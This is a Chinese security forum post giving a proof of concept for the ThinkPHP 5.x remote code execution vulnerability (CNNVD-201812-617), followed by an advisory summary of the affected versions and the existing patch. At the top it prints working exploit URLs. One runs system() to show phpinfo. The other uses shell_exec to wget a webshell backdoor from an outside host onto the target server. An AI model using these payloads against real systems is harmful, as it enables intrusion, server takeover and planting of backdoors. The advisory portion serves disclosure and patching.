请选择 进入手机版 | 继续访问电脑版
查看: 1881|回复: 0

thinkphp v5.x 远程代码执行漏洞poc

[复制链接]
  • TA的每日心情

    2019-2-12 16:37
  • 签到天数: 700 天

    [LV.9]以坛为家II

    发表于 2018-12-15 19:18:58 | 显示全部楼层 |阅读模式
    本帖最后由 90_ 于 2018-12-16 22:32 编辑

    20181216补充:

    1.执行phpinfo
    [AppleScript] 纯文本查看 复制代码
    http://unhonker.com/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'



    2. 利用该漏洞远程执行下载命令,通过wget远程下载一个webshell后门,执行命令从而获得服务器权限。
    其攻击URI详情如下:
    [AppleScript] 纯文本查看 复制代码
    /admin.php?s=admin/think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget+-O+help.php+http%3a%2f%2ftzrj.host.smartgslb.com%2fhelp.php.txt



    通过执行wget命令:
    wget -O help.php http://tzrj.host.smartgslb.com/help.php.txt

    下载webshell。

    前言

      近日,国家信息安全漏洞库(CNNVD)收到关于ThinkPHP远程代码执行漏洞(CNNVD-201812-617)情况的报送。成功利用此漏洞的攻击者可以对目标系统进行远程代码执行攻击。ThinkPHP的5.0.x版和5.1.x版等多个版本均受此漏洞影响。目前,该漏洞的部分漏洞验证代码已经公开,同时ThinkPHP官方已经发布更新修复了该漏洞,建议受该漏洞影响的ThinkPHP用户尽快采取修补措施。

      危害影响

      成功利用此漏洞的攻击者可以对目标系统进行远程代码执行攻击。目前,该漏洞的部分漏洞验证代码已在互联网上公开,近期被利用的可能性较大。
    受漏洞影响版本如下:
    ThinkPHP 5.0.x、5.1.x。



       
    poc

    本帖子中包含更多资源

    您需要 登录 才可以下载或查看,没有帐号?注册

    x
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    快速回复 返回顶部 返回列表